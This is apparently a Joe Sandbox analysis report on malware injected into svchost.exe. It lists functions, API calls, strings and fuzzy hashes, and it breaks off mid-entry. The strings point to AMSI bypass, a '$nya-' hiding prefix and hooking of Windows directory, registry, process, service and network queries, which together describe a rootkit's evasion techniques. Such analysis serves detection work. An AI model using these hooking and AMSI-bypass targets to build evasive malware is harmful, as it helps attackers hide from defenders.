AmsiScanBuffer, xrefs: 00000195DD5C2012
EnumServiceGroupW, xrefs: 00000195DD5C1F50
NtQueryDirectoryFile, xrefs: 00000195DD5C1EDF
NtEnumerateValueKey, xrefs: 00000195DD5C1F36
sechost.dll, xrefs: 00000195DD5C1F99
PdhGetFormattedCounterArrayW, xrefs: 00000195DD5C1FF1
NtEnumerateKey, xrefs: 00000195DD5C1F19
amsi.dll, xrefs: 00000195DD5C2019
PdhGetRawCounterArrayW, xrefs: 00000195DD5C1FD0
NtQueryDirectoryFileEx, xrefs: 00000195DD5C1EFC
EnumServicesStatusExW, xrefs: 00000195DD5C1F71, 00000195DD5C1F92
NtQuerySystemInformation, xrefs: 00000195DD5C1EA5
NtResumeThread, xrefs: 00000195DD5C1EC2
advapi32.dll, xrefs: 00000195DD5C1F57, 00000195DD5C1F78
NtDeviceIoControlFile, xrefs: 00000195DD5C1FB6
pdh.dll, xrefs: 00000195DD5C1FD7, 00000195DD5C1FF8
ntdll.dll, xrefs: 00000195DD5C1E8D

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: de7c7b0b1fa5c8bfd2a7283e6ad9184e658c645e80b04da55782a75e2e71bfbf
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 19519EB0511E4AA5EB12EFE8EC71BE433E3F744744F844523940AB6E75DE78829AD360

Function 00000195DD5C1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000195DD5C1E47
GetProcAddress.KERNEL32 ref: 00000195DD5C1E57
SleepEx.KERNELBASE ref: 00000195DD5C1E67

Strings

AmsiScanBuffer, xrefs: 00000195DD5C1E50
amsi.dll, xrefs: 00000195DD5C1E40

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: b2ba81ee3dff4456158bfad0c988b7334794b75317977c46b2f1466d5dc1a241
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: DCD06730612E05D5EB0AAB95EC747E427E3ABA9B02FC40455C50BA1BA4DE6C85598360

Function 00000195DD5C3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000195DD5C3A35
PathFindFileNameW.SHLWAPI ref: 00000195DD5C3A44

Part of subcall function 00000195DD5C3F88: StrCmpNIW.KERNELBASE(?,?,?,00000195DD5C272F), ref: 00000195DD5C3FA0

Part of subcall function 00000195DD5C3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3EDB
Part of subcall function 00000195DD5C3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F0E
Part of subcall function 00000195DD5C3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F2E
Part of subcall function 00000195DD5C3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F47
Part of subcall function 00000195DD5C3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000195DD5C3A5B), ref: 00000195DD5C3F68

CreateThread.KERNELBASE ref: 00000195DD5C3A8B

Part of subcall function 00000195DD5C1E74: GetCurrentThread.KERNEL32 ref: 00000195DD5C1E7F
Part of subcall function 00000195DD5C1E74: CreateThread.KERNELBASE ref: 00000195DD5C2043
Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2049
Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2055
Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2061
Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C206D
Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2079
Part of subcall function 00000195DD5C1E74: TlsAlloc.KERNEL32 ref: 00000195DD5C2085

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 1003c06aaf66b7c5c866787548ece578aa78949c06a5b7b0fc482ad27b2bcf41
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 2F115E31611F0D92FB62B7E8A9797ED23E3A758745F5041299406F1ED0EF7CC4648B50

Function 00000195DD5C3F88 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.KERNELBASE(?,?,?,00000195DD5C272F), ref: 00000195DD5C3FA0

Strings

$nya-, xrefs: 00000195DD5C3F99

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID:
String ID: $nya-
API String ID: 0-1266920357
Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
Instruction ID: 0e97dcb78fafe1989ea008382cd8497aa74b0bbef90c85fc47e837da8633626c
Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
Instruction Fuzzy Hash: 87D05E70322A0987FB169FE98CE06E063E2DB04744F484421D90051A00D758898EC720

Function 00000195DD592EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000195DD59302E

Memory Dump Source

Source File: 0000000C.00000003.2166828055.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_195dd590000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 81eb9ca1e145f9f3df9e1627e0e2b4308e684edaf148e2baa0fd21363b23cbcc
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 64914872B01A50C7FB658F69D420BBDB3D2FB45B98F548124DE4927F98DA38D852CB00

Function 00000195DD5C1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000195DD5C1724: GetProcessHeap.KERNEL32 ref: 00000195DD5C172F
Part of subcall function 00000195DD5C1724: HeapAlloc.KERNEL32 ref: 00000195DD5C173E
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17AE
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17DB
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C17F5
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1815
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C1830
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1850
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C186B
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C188B
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A6
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C18C6

SleepEx.KERNELBASE ref: 00000195DD5C1BDF

Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C18E1
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1901
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C191C
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C193C
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C1957
Part of subcall function 00000195DD5C1724: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1977
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C1992
Part of subcall function 00000195DD5C1724: RegCloseKey.ADVAPI32 ref: 00000195DD5C199C

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: bc7ff7d0a4b1cd314220cbc6919667ae0e82c12a0cd47d404db04aa3362832ec
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: FF316275302E0981FB52ABABD570BE963E7EB44BD0F044421AE0EE7FD6DE24C8508754

Function 00000195DE1AD220 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(?,?,00000000,00000195DE1AC987), ref: 00000195DE1AD275

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
Instruction ID: 793eeb1e93a05458d33e65646f3e43eb261e5313b62c9791bee9e1456550c0d1
Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
Instruction Fuzzy Hash: 83F04930301F0481FF9797E158333F812D36BA9B48F095422990AA62C1ED2CE58AE310

Non-executed Functions

Function 00000195DE1A2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000195DE1A3094
lstrlenW.KERNEL32 ref: 00000195DE1A32BE

Part of subcall function 00000195DE1A1A30: OpenProcess.KERNEL32 ref: 00000195DE1A1A56
Part of subcall function 00000195DE1A1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000195DE1A1A74
Part of subcall function 00000195DE1A1A30: PathFindFileNameW.SHLWAPI ref: 00000195DE1A1A83
Part of subcall function 00000195DE1A1A30: lstrlenW.KERNEL32 ref: 00000195DE1A1A8F
Part of subcall function 00000195DE1A1A30: StrCpyW.SHLWAPI ref: 00000195DE1A1AA2
Part of subcall function 00000195DE1A1A30: CloseHandle.KERNEL32 ref: 00000195DE1A1AB0

GetProcAddress.KERNEL32 ref: 00000195DE1A30A9

Part of subcall function 00000195DE1A3F88: StrCmpNIW.SHLWAPI(?,?,?,00000195DE1A272F), ref: 00000195DE1A3FA0

StrCmpNIW.SHLWAPI ref: 00000195DE1A30EC
lstrlenW.KERNEL32 ref: 00000195DE1A3214

Strings

ntdll.dll, xrefs: 00000195DE1A308D
NtQueryObject, xrefs: 00000195DE1A309F
\Device\Nsi, xrefs: 00000195DE1A30DF

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 8ebccfa928c62d8692154ca840ed037af18b33bd33b806d56abe3399b45f1b46
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 17B16A72314B9082EB6BCFE5D4227EDA3E6FB44B84F545016EE09A3794DE35E849E340

Function 00000195DD5C2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000195DD5C3094
lstrlenW.KERNEL32 ref: 00000195DD5C32BE

Part of subcall function 00000195DD5C1A30: OpenProcess.KERNEL32 ref: 00000195DD5C1A56
Part of subcall function 00000195DD5C1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000195DD5C1A74
Part of subcall function 00000195DD5C1A30: PathFindFileNameW.SHLWAPI ref: 00000195DD5C1A83
Part of subcall function 00000195DD5C1A30: lstrlenW.KERNEL32 ref: 00000195DD5C1A8F
Part of subcall function 00000195DD5C1A30: StrCpyW.SHLWAPI ref: 00000195DD5C1AA2
Part of subcall function 00000195DD5C1A30: CloseHandle.KERNEL32 ref: 00000195DD5C1AB0

GetProcAddress.KERNEL32 ref: 00000195DD5C30A9

Part of subcall function 00000195DD5C3F88: StrCmpNIW.KERNELBASE(?,?,?,00000195DD5C272F), ref: 00000195DD5C3FA0

StrCmpNIW.SHLWAPI ref: 00000195DD5C30EC
lstrlenW.KERNEL32 ref: 00000195DD5C3214

Strings

\Device\Nsi, xrefs: 00000195DD5C30DF
NtQueryObject, xrefs: 00000195DD5C309F
ntdll.dll, xrefs: 00000195DD5C308D

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 7baec0e749eea545dc07e13fd9085781a8f7b34d15abc23b24d43480ce1bb5d0
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 9DB18F32212E9C86FB669FAAD5207E9A3E6F745B84F445016EE49A3F94DF35CC80C740

Function 00000195DE1A84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000195DE1A84CC
RtlCaptureContext.NTDLL ref: 00000195DE1A84F9
RtlLookupFunctionEntry.NTDLL ref: 00000195DE1A8513
RtlVirtualUnwind.NTDLL ref: 00000195DE1A8554
IsDebuggerPresent.KERNEL32 ref: 00000195DE1A85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000195DE1A85C5
UnhandledExceptionFilter.KERNEL32 ref: 00000195DE1A85D0

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 4873ab1377631ed3b5f642209de13ce363605dc6f49551d8c78314de9a13edb2
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 12313A72305F8086EB619FE0E8643ED73A6F785749F44402ADA4E57B94DF38D548C710

Function 00000195DD5C84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000195DD5C84CC
RtlCaptureContext.NTDLL ref: 00000195DD5C84F9
RtlLookupFunctionEntry.NTDLL ref: 00000195DD5C8513
RtlVirtualUnwind.NTDLL ref: 00000195DD5C8554
IsDebuggerPresent.KERNEL32 ref: 00000195DD5C85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000195DD5C85C5
UnhandledExceptionFilter.KERNEL32 ref: 00000195DD5C85D0

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 839d25c3ad72a351675eb302e06987ece0838a490c36857a67cbe2bbbb68fbe8
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 4C314D76205F808AEB618FA4E8A03EE73E5F785748F44442ADA4E57B98DF78C648C710

Function 00000195DE1ACD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000195DE1ACE0B
RtlLookupFunctionEntry.NTDLL ref: 00000195DE1ACE23
RtlVirtualUnwind.NTDLL ref: 00000195DE1ACE5E
IsDebuggerPresent.KERNEL32 ref: 00000195DE1ACE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000195DE1ACEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000195DE1ACEAC

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: ca55ca207916cb9fbcffb1604f6be81213e2bc2e383c54733c27bd12b3e734fd
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 95416C36314F8086EB61CFA4E8513EE77A6F789754F500115EA8D57BA8DF38C559CB00

Function 00000195DD5CCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000195DD5CCE0B
RtlLookupFunctionEntry.NTDLL ref: 00000195DD5CCE23
RtlVirtualUnwind.NTDLL ref: 00000195DD5CCE5E
IsDebuggerPresent.KERNEL32 ref: 00000195DD5CCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000195DD5CCEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000195DD5CCEAC

Memory Dump Source

Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true

Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 4935540b7b4c0bed928b046f01ff0cc318abf1098679f9b93d6a2f4bad31146a
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 91416C36214F8086EB61CF69E8503EE73E5F789798F500225EA8D57B98DF78C559CB00

Function 00000195DE1ADA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000195DE1ADB99
FindNextFileW.KERNEL32 ref: 00000195DE1ADCCF
FindClose.KERNEL32 ref: 00000195DE1ADD0F
FindClose.KERNEL32 ref: 00000195DE1ADD3B

Memory Dump Source

Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true

Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
